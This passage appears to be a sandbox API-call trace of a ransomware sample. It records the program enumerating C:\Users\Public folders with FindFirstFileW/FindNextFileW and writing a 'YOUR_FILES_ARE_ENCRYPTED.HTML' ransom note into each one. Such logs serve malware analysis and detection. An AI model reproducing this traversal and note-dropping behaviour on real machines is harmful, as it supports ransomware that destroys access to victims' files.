nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0171.545] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0171.545] GetProcessHeap () returned 0x270000 [0171.545] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.545] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0171.545] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*" [0171.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b5ed1fc, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b5ed1fc, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b5ed1fc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.546] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0171.546] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.546] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.546] lstrlenW (lpString=".ini") returned 4 [0171.546] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0171.546] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0171.546] GetProcessHeap () returned 0x270000 [0171.546] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.548] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0171.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*" [0171.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.548] GetProcessHeap () returned 0x270000 [0171.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.549] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0171.549] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0171.549] GetProcessHeap () returned 0x270000 [0171.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.549] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0171.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*" [0171.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.549] GetProcessHeap () returned 0x270000 [0171.550] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.550] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0171.550] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0171.550] GetProcessHeap () returned 0x270000 [0171.550] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.550] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0171.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*" [0171.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.550] GetProcessHeap () returned 0x270000 [0171.551] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.551] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0171.551] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.551] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.555] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.557] CloseHandle (hObject=0x5a0) returned 1 [0171.557] GetProcessHeap () returned 0x270000 [0171.558] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.558] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0171.558] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0171.558] GetProcessHeap () returned 0x270000 [0171.558] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.558] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0171.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*" [0171.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b3fe018, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.559] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0171.559] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.559] lstrlenW (lpString=".ini") returned 4 [0171.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b3fe018, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.559] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.559] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.560] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.562] CloseHandle (hObject=0x5a0) returned 1 [0171.562] GetProcessHeap () returned 0x270000 [0171.562] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.562] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0171.562] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites") returned 29 [0171.562] GetProcessHeap () returned 0x270000 [0171.562] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.562] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites") returned="\\\\?\\C:\\Users\\Public\\Favorites" [0171.563] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned="\\\\?\\C:\\Users\\Public\\Favorites\\*" [0171.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.563] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.563] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.563] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.563] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.564] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.566] CloseHandle (hObject=0x5a0) returned 1 [0171.566] GetProcessHeap () returned 0x270000 [0171.566] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.566] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0171.567] GetProcessHeap () returned 0x270000 [0171.567] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.567] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0171.567] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*" [0171.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b5ed1fc, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b5ed1fc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0171.568] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.568] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.568] lstrlenW (lpString=".ini") returned 4 [0171.568] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0171.568] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.568] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0171.568] lstrlenW (lpString=".library-ms") returned 11 [0171.568] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0171.568] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\libraries\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.571] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.573] CloseHandle (hObject=0x5a0) returned 1 [0171.573] GetProcessHeap () returned 0x270000 [0171.574] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.574] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0171.574] GetProcessHeap () returned 0x270000 [0171.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.574] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0171.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*") returned="\\\\?\\C:\\Users\\Public\\Music\\*" [0171.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3b1d58, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3b1d58, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.574] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0171.574] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.574] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.574] lstrlenW (lpString=".ini") returned 4 [0171.574] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.574] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned 38 [0171.574] GetProcessHeap () returned 0x270000 [0171.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.574] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" [0171.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*" [0171.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b61335c, 